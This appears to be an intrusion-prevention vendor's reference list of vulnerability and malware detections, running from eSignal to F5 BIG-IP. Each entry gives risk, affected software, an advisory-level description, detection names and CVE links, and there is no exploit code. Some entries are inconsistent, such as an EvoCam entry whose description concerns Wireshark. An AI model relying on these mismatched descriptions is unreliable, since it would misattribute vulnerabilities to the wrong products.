A buffer overflow exists in eSignal, a real-time market data and support tool. The vulnerability allows remote attackers to execute arbitrary code on vulnerable systems. Advanced exploit attempts may cause arbitrary injected code to be executed. This may allow the remote attacker to gain control over the system. Injected code will be executed with the privileges of the user running the eSignal application. A simple exploit attempt will cause the eSignal application to terminate after performing an access violation.

Situation:

HTTP_CS-Esignal-Buffer-Overflow

References:

CVE-2004-1868
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1868

BID-9978
http://www.securityfocus.com/bid/9978

EsteemAudit-Exploit-Tool

About this vulnerability:

EsteemAudit Tool

Risk:

High

First detected in:

sgpkg-ips-924-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

EsteemAudit is an exploit tool released by the Shadow Brokers in April 2017.

Situation:

Generic_CS-Remote-Desktop-EsteemAudit-Client-Request

References:

CVE-2017-0176
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0176

Estsoft-Alzip-Mim-File-Processing-Buffer-Overflow

About this vulnerability:

A vulnerability in ESTSoft ALZip

Risk:

Moderate

First detected in:

sgpkg-ips-405-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ESTSoft ALZip

Type:

Buffer Overflow

Description:

A code execution vulnerability exists in ESTsoft ALZip product. The vulnerability exists in libETC.dll library and is due to improper processing of the filename or name parameter within MIM file headers which will result in a stack-buffer overflow if an overly long filename is provided. A remote attacker can exploit this vulnerability to execute arbitrary code. A remote unauthenticated attacker could exploit the vulnerability by convincing a user to open a malicious file and execute arbitrary code in the context of the logged in user.

Situation:

HTTP_SS-Estsoft-Alzip-Mim-File-Processing-Buffer-Overflow
File-Text_Estsoft-Alzip-Mim-File-Processing-Buffer-Overflow

References:

CVE-2011-1336
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1336

BID-48493
http://www.securityfocus.com/bid/48493

OSVDB-73684
http://www.osvdb.org/73684

Etcd-API-Stored-Keys-Disclosure

About this vulnerability:	A vulnerability in Etcd
Risk:	High
First detected in:	sgpkg-ips-1174-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Etcd
Type:	Insecure Configuration
Description:	A vulnerability in Etcd which allows remote attackers to retrieve all stored key values through an API request.
Situation:	HTTP_CSU-Etcd-API-Stored-Keys-Disclosure

EternalBlue-Probe

About this vulnerability:

EternalBlue probing communication

Risk:

High

First detected in:

sgpkg-ips-905-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

<os>

Type:

Malfunction

Description:

An unknown FID reply to an unknown FID SMB Trans request. This behaviour is common in computers vulnerable against MS17-010 exploit.

Situation:

SMB-TCP_EternalBlue-Large-Buffer
SMB-TCP_Windows-Named-Pipe-Execution-Status-Unset
SMB-TCP_Known-EternalBlue-Probe-Echo-Reply
SMB-TCP_SHS-EternalBlue-Probe

References:

MS17-010
http://technet.microsoft.com/security/bulletin/MS17-010

Ethereal-AFP-Dissector-Format-String

About this vulnerability:

Format string vulnerability in Ethereal AFP dissector

Risk:

Moderate

First detected in:

sgpkg-ips-35-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ethereal

Type:

Format String

Description:

Ethereal is a network packet capturing utility. A format string vulnerability in the Ethereal AFP dissector allows a remote attacker to compromise a system running vulnerable Ethereal by sending a specially crafted packet to the network where the traffic is captured.

Situation:

Generic_Ethereal-AFP-Format-String

References:

CVE-2005-2367
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2367

BID-14399
http://www.securityfocus.com/bid/14399

Ethereal-Multiple-Protocol-Dissector-Buffer-Overflows

About this vulnerability:

Multiple buffer overflow vulnerabilities in Ethereal protocol dissectors

Risk:

Moderate

First detected in:

sgpkg-ips-26-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ethereal

Type:

Buffer Overflow

Description:

Ethereal is a network packet capturing utility. Many protocol dissectors in Ethereal contains buffer overflow vulnerabilities: SIP, CMIP, CMP, CMS, CRMF, ESS, OCSP, X.509, ISIS, DISTCC, FCELS, Q.931, NCP, TCAP, ISUP, MEGACO, PKIX1Explitit, PKIX_Qualified, Presentation. Remote attacker is able to exploit these vulnerabilities to execute arbitrary code with the privileges of the user that activated the vulnerable application.

Situation:

Generic_Ethereal-DistCC-BOF
SIP-UDP_CS-Ethereal-SIP-BOF

References:

CVE-2005-1461
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1461

BID-13504
http://www.securityfocus.com/bid/13504

Ethereal-Multiple-Vulnerabilities

About this vulnerability:

Multiple vulnerabilities in Ethereal

Risk:

High

First detected in:

sgpkg-ips-416-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ethereal

Type:

Buffer Overflow

Description:

Ethereal traffic analyzer prior to version 0.10.3 contains several buffer overflow vulnerabilities that can be exploited to crash the program or to execute arbitrary command on the system with the superuser privileges.

Situation:

Generic_UDP-Ethereal-NetFlow-Buffer-Overflow

References:

CVE-2004-0176
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0176

BID-9952
http://www.securityfocus.com/bid/9952

OSVDB-6893
http://www.osvdb.org/6893

EtterSilent-Malware-Infection-Traffic

About this vulnerability:	EtterSilent malware infection traffic detected
Risk:	High
First detected in:	sgpkg-ips-1343-5242
Last changed:	sgpkg-ips-1343-5242
Platform:	Generic
Software:	<os>
Type:	Backdoor
Description:	EtterSilent malware download infrastructure or infection traffic was detected.
Situation:	File-Text_Malicious_Redirection_EtterSilent_Detected

Eudora-SMTP-Client-BOF

About this vulnerability:	Buffer Overflow in Eudora
Risk:	Moderate
First detected in:	sgpkg-ips-137-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Eudora
Type:	Buffer Overflow
Description:	There is a buffer overflow vulnerability in Eudora 7.1. A specially crafted SMTP server reply triggers the vulnerability. A successful exploit leads to remote compromise.
Situation:	SMTP_Eudora-Server-Reply-Handling-BOF

Eudora-Url-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in Eudora

Risk:

High

First detected in:

sgpkg-ips-419-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Eudora

Type:

Buffer Overflow

Description:

There is a vulnerability within certain versions of Eudora, an e-mail client released by Qualcomm Corporation, that allows a remote attacker to cause Eudora to terminate upon clicking a malicious link within an e-mail sent by the attacker. It is possible for the remote attacker to execute arbitrary code on the victim's computer.

Situation:

File-Text_Eudora-Url-Handling-Buffer-Overflow

References:

BID-10298
http://www.securityfocus.com/bid/10298

Euniverse-Perfectnav

About this vulnerability:	eUniverse PerfectNav
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	eUniverse PerfectNav
Type:	Misconfiguration
Description:	eUniverse's PerfectNav is an adware that will open pop-up ads but can also hijac your browser to redirect you to PerfectNav's web page when mistyping a URL.
Situation:	HTTP_CSH-Euniverse-Perfectnav

Eureka-Email-2.2q-POP3-Buffer-Overflow

About this vulnerability:

A Eureka Email 2.2q POP3 Stack Based Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-676-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP SP3

Software:

Eureka Email

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in Eureka Email 2.2q which allows remote attackers to execute arbitrary code by sending a long error message.

Situation:

POP3_SS-Eureka-Email-2.2q-POP3-Buffer-Overflow

References:

CVE-2009-3837
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3837

OSVDB-59262
http://www.osvdb.org/59262

Evasion-In-SQL-Injection

About this vulnerability:	SQL comment in HTTP request parameter - possible evasion in SQL injection
Risk:	Low
First detected in:	sgpkg-ips-242-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	SQL Injection
Description:	An SQL comment has been detected in an HTTP request parameter. This may indicate an evasion in an SQL injection attempt to avoid attack detection.
Situation:	HTTP_CRL-Possible-Evasion-In-SQL-Injection

Evernote-For-Mac-Embedded-Link-Directory-Traversal

About this vulnerability:

A vulnerability in Evernote for Mac

Risk:

Moderate

First detected in:

sgpkg-ips-1163-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Evernote for Mac

Type:

Directory Traversal

Description:

Improper validation of embedded links in notes causes a directory traversal vulnerability in Evernote for Mac. A successful exploit may allow an attacker execute arbitrary code on the target system.

Situation:

File-TextId_Evernote-For-Mac-Embedded-Link-Directory-Traversal

References:

CVE-2019-10038
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10038

EvoLogical-EvoCam-Web-Server-Buffer-Overflow

About this vulnerability:

EvoLogical EvoCam Web Server Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-654-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Mac OS X

Software:

EvoCam Web Server

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability Wireshark version 3.6.6 and 3.6.7 which allows remote attackers to execute arbitrary code via a long GET request.

Situation:

HTTP_CSU-EvoLogical-EvoCam-Web-Server-Buffer-Overflow

References:

CVE-2010-2309
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2309

BID-40489
http://www.securityfocus.com/bid/40489

OSVDB-65043
http://www.osvdb.org/65043

Excel-Insufficient-Record-Validation-Vulnerability-CVE-2011-1272

About this vulnerability:

An attempt to exploit vulnerability in Microsoft Excel detected

Risk:

Moderate

First detected in:

sgpkg-ips-396-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Input Validation

Description:

Vulnerability in Microsoft Excel

Situation:

HTTP_SS-Excel-Insufficient-Record-Validation-Vulnerability-CVE-2011-1272
File-OLE_Excel-Insufficient-Record-Validation-Vulnerability-CVE-2011-1272

References:

CVE-2011-1272
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1272

BID-48157
http://www.securityfocus.com/bid/48157

MS11-045
http://technet.microsoft.com/security/bulletin/MS11-045

Excel-Memory-Corruption-CVE-2010-0823

About this vulnerability:

A memory corruption vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-312-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Microsoft Office

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Excel.

Situation:

E-Mail_BS-Excel-Memory-Corruption-CVE-2010-0823
HTTP_SS-Excel-Memory-Corruption-CVE-2010-0823
File-OLE_Excel-Memory-Corruption-CVE-2010-0823

References:

CVE-2010-0823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0823

OSVDB-65233
http://www.osvdb.org/65233

MS10-038
http://technet.microsoft.com/security/bulletin/MS10-038

Exchange-DoS-MS03-046

About this vulnerability:

Microsoft Exchange Server Denial of Service (MS03-046)

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Exchange Server 2000; Exchange Server 5.5

Type:

Input Validation

Description:

Microsoft Exchange Server can be requested to receive a binary file. This special extended verb request defines the file size, allowing the attacker to request for huge files thus causing memory allocation to fail. In addition, aspecially crafted packet may cause a buffer overflow in Exchange Server 2000, that could potentially compromise the system.

Situation:

SMTP_Exchange-DoS-MS03-051

References:

CVE-2003-0714
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0714

BID-8838
http://www.securityfocus.com/bid/8838

MS03-046
http://technet.microsoft.com/security/bulletin/MS03-046

Executable-File-In-Document

About this vulnerability:	Arbitary executable file transfer
Risk:	High
First detected in:	sgpkg-ips-344-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Backdoor
Description:	An executable file was found inside a document file. This is uncommon and may indicate that document is or contains malware.
Situation:	HTTP_Executable-File-Within-Downloaded-MS-OLE File-OLE_Embedded-Executable-File

Executable-File-Transfer

About this vulnerability:	Arbitary executable file transfer
Risk:	Low
First detected in:	sgpkg-ips-110-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Backdoor
Description:	Arbitrary executable file transfer across untrusted networks may expose the system to malware infection or indicate such infection under some conditions.
Situation:	Shared_Executable-File-Upload Shared_Executable-File-Download Shared_ELF-Executable-File-Download Shared-UDP_Executable-File-Transfer E-Mail_BS-Executable-File-Transfer FTP_DL-Executable-File-Download FTP_UL-Executable-File-Upload SMB-TCP_FR-Executable-File-Read SMB-TCP_FW-Executable-File-Write TFTP_CS-Executable-File-Upload TFTP_SS-Executable-File-Download File-Exe_Executable-File-Download File-Exe_Executable-File-Upload File-Exe_Executable-File-Transfer File-Zip_Executable-In-JAR File-Zip_Executable-In-Archive File-Exe_Executable-In-Archive File-Binary_ELF-Executable-File-Transfer File-Binary_Mach-O-Executable-File-Transfer

Executable_Disguised_As_Image_File

About this vulnerability:	Executable disguised as an image file was detected
Risk:	Moderate
First detected in:	sgpkg-ips-1064-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	An executable with an image file extension was detected. Malicious actors may disguise their executable files using this technique to bypass detection.
Situation:	File-Exe_Executable_Disguised_As_Image_File

Exiftool-DjVu-Remote-Code-Execution

About this vulnerability:

A vulnerability in ExifTool Project ExifTool

Risk:

High

First detected in:

sgpkg-ips-1353-5242

Last changed:

sgpkg-ips-1402-5242

Platform:

Generic

Software:

ExifTool; GitLab

Type:

Input Validation

Description:

An arbitrary code execution vulnerability has have been reported in the DjVu module of ExifTool. The vulnerability is due to unsafe evaluation and improper parsing of annotation strings. A remote attacker can exploit this vulnerability by having ExifTool process a maliciously crafted DjVu file. Successful exploitation could result in the execution of arbitrary code under the security context of the user running ExifTool. This situation also covers CVE-2021-22205.

Situation:

File-Binary_Exiftool-DjVu-Remote-Code-Execution
File-Text_Exiftool-DjVu-Remote-Code-Execution

References:

CVE-2021-22204
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22204

Exim-B64decode-Off-By-One

About this vulnerability:

A vulnerability in Exim Project Exim

Risk:

Moderate

First detected in:

sgpkg-ips-1064-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Exim

Type:

Buffer Overflow

Description:

Improper buffer size calcuation during base64 decoding causes a buffer overflow vulnerability in Exim. A successful exploitation allows an attacker to execute arbitrary code on the target system.

Situation:

SMTP_CS-Exim-B64decode-Off-By-One

References:

CVE-2018-6789
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6789

Exim-Bdat-Denial-Of-Service

About this vulnerability:

A vulnerability in Exim Project Exim

Risk:

Moderate

First detected in:

sgpkg-ips-1022-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Exim

Type:

Resource Starvation

Description:

A denial-of-service vulnerability in the Exim message transfer agent can be exploited by a remote, unauthenticated attacker. Successful exploitation could result in denial-of-service conditions.

Situation:

SMTP_CS-Exim-Bdat-Denial-Of-Service

References:

CVE-2017-16944
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16944

Exim-Bdat-Use-After-Free

About this vulnerability:

A vulnerability in Exim Project Exim

Risk:

Moderate

First detected in:

sgpkg-ips-1021-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Exim

Type:

Malfunction

Description:

Improper parsing of SMTP commands causes a use-after-free vulnerability in the Exim server. A successful exploit allows an attacker to run arbitrary code on the target system with the privileges of the server process.

Situation:

SMTP_Exim-Bdat-Use-After-Free

References:

CVE-2017-16943
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16943

Exim-Buffer-Overflows

About this vulnerability:

A vulnerability in Exim Project Exim

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Exim

Type:

Malfunction

Description:

There are two vulnerabilities in Exim MTA (Mail Transfer Agent) software. The first vulnerability is in the SMTP sender information verification process. The second vulnerability exists in the header syntax checking of the message body process. Both vulnerabilities allow a remote attacker to cause a stack buffer overflow on the target server. Upon exploitation, both vulnerabilities could lead to remote code execution on the vulnerable Exim server under the privilege of the user account that runs Exim. When the stack buffer is overflowed, the child process serving the remote client will crash and terminate. If the attack email message is carefully crafted, the attacker could gain control of the process and run the arbitrary code in the attacking payload. The actual behaviour of the attack target depends on the content of executed code.

Situation:

SMTP_CS-Exim-Buffer-Overflows

References:

CVE-2004-0399
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0399

BID-10290
http://www.securityfocus.com/bid/10290

Exim-Deliver_Message-Command-Injection

About this vulnerability:

A vulnerability in Exim

Risk:

Moderate

First detected in:

sgpkg-ips-1169-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Exim

Type:

Input Validation

Description:

There has been reported a command injection vulnerability in Exim. This vulnerability could be exploited by a remote attacker. Successful exploitation can lead in arbitrary code execution.

Situation:

SMTP_CS-Exim-Deliver_Message-Command-Injection

References:

CVE-2019-10149
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10149

Exim-DKIM-DNS-Decoding-Buffer-Overflow

About this vulnerability:

A vulnerability in Exim Project Exim

Risk:

High

First detected in:

sgpkg-ips-490-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Exim

Type:

Buffer Overflow

Description:

A code execution vulnerability has been reported in Exim MTA. The vulnerability is due to an error while handling certain DKIM DNS records which can lead to a heap buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability to execute arbitrary code on the affected system.

Situation:

DNS-TCP_Exim-DKIM-DNS-Decoding-Buffer-Overflow
DNS-UDP_Exim-DKIM-DNS-Decoding-Buffer-Overflow

References:

CVE-2012-5671
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5671

BID-56285
http://www.securityfocus.com/bid/56285

OSVDB-86616
http://www.osvdb.org/86616

Exim-Etrn-SQL-Injection-CVE-2025-26794

About this vulnerability:

A vulnerability in Exim Project Exim

Risk:

Moderate

First detected in:

sgpkg-ips-1846-5242

Last changed:

sgpkg-ips-1846-5242

Platform:

Generic

Software:

Exim

Type:

Input Validation

Description:

Improper handling of SMTP commands causes an SQL injection vulnerability in Exim. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.

Situation:

SMTP_Exim-Etrn-SQL-Injection-CVE-2025-26794

References:

CVE-2025-26794
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-26794

Exim-External-Authenticator-Out-Of-Bounds-Write

About this vulnerability:

A vulnerability in Exim

Risk:

High

First detected in:

sgpkg-ips-1690-5242

Last changed:

sgpkg-ips-1690-5242

Platform:

Generic

Software:

Exim

Type:

Input Validation

Description:

An out-of-bounds write vulnerability has been reported for Exim. This vulnerability is due to improper validation of user-supplied data in the external authenticator. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution under the security context of the user running the vulnerable application.

Situation:

SMTP_CS-Exim-External-Authenticator-Out-Of-Bounds-Write

References:

CVE-2023-42115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42115

Exim-Filename-Header-Misparsing-CVE-2024-39929

About this vulnerability:

An attempt to exploit a vulnerability in Exim detected

Risk:

High

First detected in:

sgpkg-ips-1753-5242

Last changed:

sgpkg-ips-1753-5242

Platform:

Generic

Software:

Exim

Type:

Input Validation

Description:

Exim through 4.97.1 misparses a multiline RFC 2231 header filename, and thus remote attackers can bypass a $mime_filename extension-blocking protection mechanism, and potentially deliver executable attachments to the mailboxes of end users.

Situation:

E-Mail_Exim-Filename-Header-Misparsing-CVE-2024-39929

References:

CVE-2024-39929
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39929

Exim-Remote-Code-Execution-CVE-2019-15846

About this vulnerability:

A vulnerability in Exim

Risk:

High

First detected in:

sgpkg-ips-1186-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Exim

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Exim.

Situation:

SMTP_CS-Exim-Remote-Code-Execution-CVE-2019-15846
TLS-SNI_Exim-Remote-Code-Execution-CVE-2019-15846

References:

CVE-2019-15846
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15846

Exim-String-Format-Remote-Code-Execution

About this vulnerability:

A vulnerability in Exim.org Exim4

Risk:

High

First detected in:

sgpkg-ips-367-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Exim

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in Exim MTA (Mail Transfer Agent). The buffer overflow is due to improper handling of email headers, which can lead to remote code execution. Remote attackers can exploit this vulnerability to execute arbitrary code on a vulnerable Exim server by sending a specially crafted email to the vulnerable server. The code is executed in the security context of the affected server.

Situation:

SMTP_CS-Exim-String-Format-Remote-Code-Execution
SMTP_CS-Data-Command-Very-Large-Header-Section

References:

CVE-2010-4344
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4344

BID-45308
http://www.securityfocus.com/bid/45308

OSVDB-69685
http://www.osvdb.org/69685

Exim-With-Dovecot-Lda-Sender_Address-Parameter-Remote-Command-Execution

About this vulnerability:

A vulnerability in Exim Project Exim

Risk:

High

First detected in:

sgpkg-ips-539-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Exim

Type:

Malfunction

Description:

A remote command execution vulnerability exist in Exim MTA that uses the Dovecot as the Local Delivery Agent (LDA). The vulnerability is due to the dangerous configuration in Dovecot suggesting the "use_shell" option. The content of the variable $sender_address can, in most standard setups, be controlled by an attacker, its value is inserted verbatim into the string which is supplied to the shell. This enables attackers to execute arbitrary shell commands within the context of Exim system user. A remote attacker could exploit this vulnerability by sending a malicious 'sender_address' parameter, which is supplied via a 'MAIL FROM' header. Successful exploitation would lead to remote shell commands execution within the context of the Exim user.

Situation:

SMTP_Exim-With-Dovecot-Lda-Sender_Address-Parameter-Remote-Command-Execution

References:

OSVDB-93004
http://www.osvdb.org/93004

Exorcist-C2-Traffic

About this vulnerability:	Exorcist C2 traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1289-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Exorcist is a ransomware that targets Windows hosts.
Situation:	HTTP_CRH-Exorcist-C2-Traffic

Exponent-CMS-Eaascontroller-API-Function-SQL-Injection

About this vulnerability:

A vulnerability in exponent CMS

Risk:

Moderate

First detected in:

sgpkg-ips-895-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

exponent CMS

Type:

Input Validation

Description:

Lack of validation when processing the apikey parameter passed to the api() function causes an SQL injection vulnerability in the Exponent CMS. A successful attack allows an attacker to run arbitrary SQL commands on the target system.

Situation:

HTTP_CRL-Exponent-CMS-Eaascontroller-API-Function-SQL-Injection

References:

CVE-2017-7991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7991

Extremeware-Event-Log-Telnet-Failure-XSS

About this vulnerability:	Cross-Site scripting attack by injecting html scripts into login
Risk:	Moderate
First detected in:	sgpkg-ips-367-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Cross-site Scripting
Description:	The Extreme Summit7iTx switch is vulnerable to a cross-site scripting flaw in the Event Log viewer in the web interface. This can be exploited by injecting html scripts into login name via the telnet interface. The login name of the failed login, ie. the script, will be copied into the event log. When the log viewed by a web browser, the attack is executed.
Situation:	Telnet_Possible-XSS-Script-In-Login

EyesOfNetwork-Autodiscovery-Target-Command-Execution-CVE-2020-8654

About this vulnerability:

A vulnerability in EyesOfNetwork

Risk:

High

First detected in:

sgpkg-ips-1232-5242

Last changed:

sgpkg-ips-1834-5242

Platform:

Linux; Unix

Software:

EyesOfNetwork

Type:

Input Validation

Description:

There exists a vulnerability in EyesOfNetwork, version 5.3 with API version 2.4.2, which allows remote attackers to execute arbitrary commands via the target parameter to autodiscovery.php, CVE-2020-8654. Credentials can be retrieved via SQL injection to the username parameter to getApiKey, CVE-2020-8656.

Situation:

HTTP_CRL-EyesOfNetwork-Autodiscovery-Target-Command-Execution-CVE-2020-8654

References:

CVE-2020-8654
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8654

EyesOfNetwork-Hardcoded-API-Key

About this vulnerability:

An attempt to exploit a vulnerability in EyesOfNetwork detected

Risk:

High

First detected in:

sgpkg-ips-1407-5242

Last changed:

sgpkg-ips-1834-5242

Platform:

Generic

Software:

EyesOfNetwork

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in EyesOfNetwork detected.

References:

CVE-2020-8657
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8657

EyesOfNetwork-Username-SQL-Injection-CVE-2020-8656

About this vulnerability:

A vulnerability in EyesOfNetwork

Risk:

High

First detected in:

sgpkg-ips-1834-5242

Last changed:

sgpkg-ips-1834-5242

Platform:

Linux; Unix

Software:

EyesOfNetwork

Type:

SQL Injection

Description:

Situation:

HTTP_CRL-EyesOfNetwork-Username-SQL-Injection-CVE-2020-8656

References:

CVE-2020-8656
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8656

EzSoftware-Eznet-Long-HTTP-Request-BOF

About this vulnerability:

Buffer overflow in eZ Software ezNet.exe HTTP server

Risk:

Moderate

First detected in:

sgpkg-ips-14-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

eZnetwork eZ

Type:

Buffer Overflow

Description:

eZnet.exe is vulnerable to a stack-based buffer overflow. A remote attacker can send a long HTTP request to overflow a buffer and possibly execute arbitrary code on the system or cause the system to crash.

Situation:

HTTP_CSU-EzSoftware-Eznet-Long-HTTP-Request-BOF-1
HTTP_CSU-EzSoftware-Eznet-Long-HTTP-Request-BOF-2
HTTP_CSU-EzSoftware-Eznet-Long-HTTP-Request-BOF-3

References:

BID-9167
http://www.securityfocus.com/bid/9167

Ezula

About this vulnerability:	EZula
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	EZula
Type:	Misconfiguration
Description:	Ezula is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Ezula

F-Secure-AntiVirus-Library-Heap-Overflow

About this vulnerability:

A vulnerability in F-Secure Anti-Virus

Risk:

Moderate

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

F-Secure Anti-Virus; F-Secure Internet Gatekeeper

Type:

Malfunction

Description:

F-Secure AntiVirus Library is used to parse different file formats to detect malware. Before archive decompression, the library does not properly check the length of certain fields. These fields are copied into a fixed sized heap buffer. As a result, when a file with an overly long filename is processed a heap overflow will occur. This vulnerability can be triggered by an unauthenticated remote attacker, without user interaction, by sending an e-mail containing a crafted ARJ archive file to the target F-Secure AntiVirus Library on client, server, and gateway implementations. Additional attack vectors exist over other common protocols (e.g. HTTP, FTP, POP3), but some may require user interaction. The attacker can execute code of his choice on the target system by triggering the vulnerability. It is possible to create crafted ARJ archives that cause buffer overflow. The attacker can send an e-mail that contains the crafted ARJ archive to the target system. In gateway environments and scheduled scanning on servers, the F-Secure affected Anti-virus products scanned the ARJ archive without user interaction, which causes buffer overflow, so the malicious user is successful in injecting and executing supplied code, and the target system is dependent on the nature and intent of the injected code. Additional attack vectors exist over other common protocols: HTTP, FTP, POP3, etc. Users may download the crafted ARJ archives from malicious websites or receive e-mails attached by crafted ARJ archives on their computer systems installed F-Secure affected Anti-virus products. When the users try to operate the crafted ARJ archives, the F-Secure Anti-virus product will check the ARJ archives, so the attacker can crash the target system or execute code of his choice on the target system.

Situation:

File-Binary_F-Secure-AntiVirus-Library-Heap-Overflow

References:

CVE-2005-0350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0350

BID-12515
http://www.securityfocus.com/bid/12515

F-Secure-Policy-Manager-Information-Disclosure

About this vulnerability:

Information disclosure vulnerability in F-Secure Policy Manager

Risk:

Low

First detected in:

sgpkg-ips-18-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

F-Secure Policy Manager

Type:

Malfunction

Description:

The Management Agent in F-Secure Policy Manager 5.11.2810 allows remote attackers to gain sensitive information, such as the absolute path for the web server, via an HTTP request without any parameters to fsmsh.dll.

Situation:

HTTP_CSU-F-Secure-Policy-Manager-Information-Disclosure

References:

CVE-2004-1223
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1223

BID-11869
http://www.securityfocus.com/bid/11869

F5-Big-IP-And-Big-IQ-iControl-iControlportal.cgi-Format-String-Vulnerability

About this vulnerability:

A vulnerability in F5 Networks BIG-IP

Risk:

High

First detected in:

sgpkg-ips-1564-5242

Last changed:

sgpkg-ips-1564-5242

Platform:

Generic

Software:

F5 Networks BIG-IP; F5 Networks Big-IQ

Type:

Format String

Description:

A format string vulnerability has been reported in the iControl SOAP endpoints of F5 BIG-IP and BIG-IQ. The vulnerability is due to improper handling of requests sent to the web interface. A remote attacker can exploit the vulnerability by sending crafted requests to the target server. Successful exploitation could result in remote code execution within the service of the target server.

Situation:

HTTP_CRL-F5-Big-IP-And-Big-IQ-iControl-iControlportal.cgi-Format-String-Vulnerability

References:

CVE-2023-22374
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22374

F5-Big-IP-ASM-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in F5 Big IP

Risk:

High

First detected in:

sgpkg-ips-1330-5242

Last changed:

sgpkg-ips-1330-5242

Platform:

Generic

Software:

F5 Networks BIG-IP

Type:

Malfunction

Description:
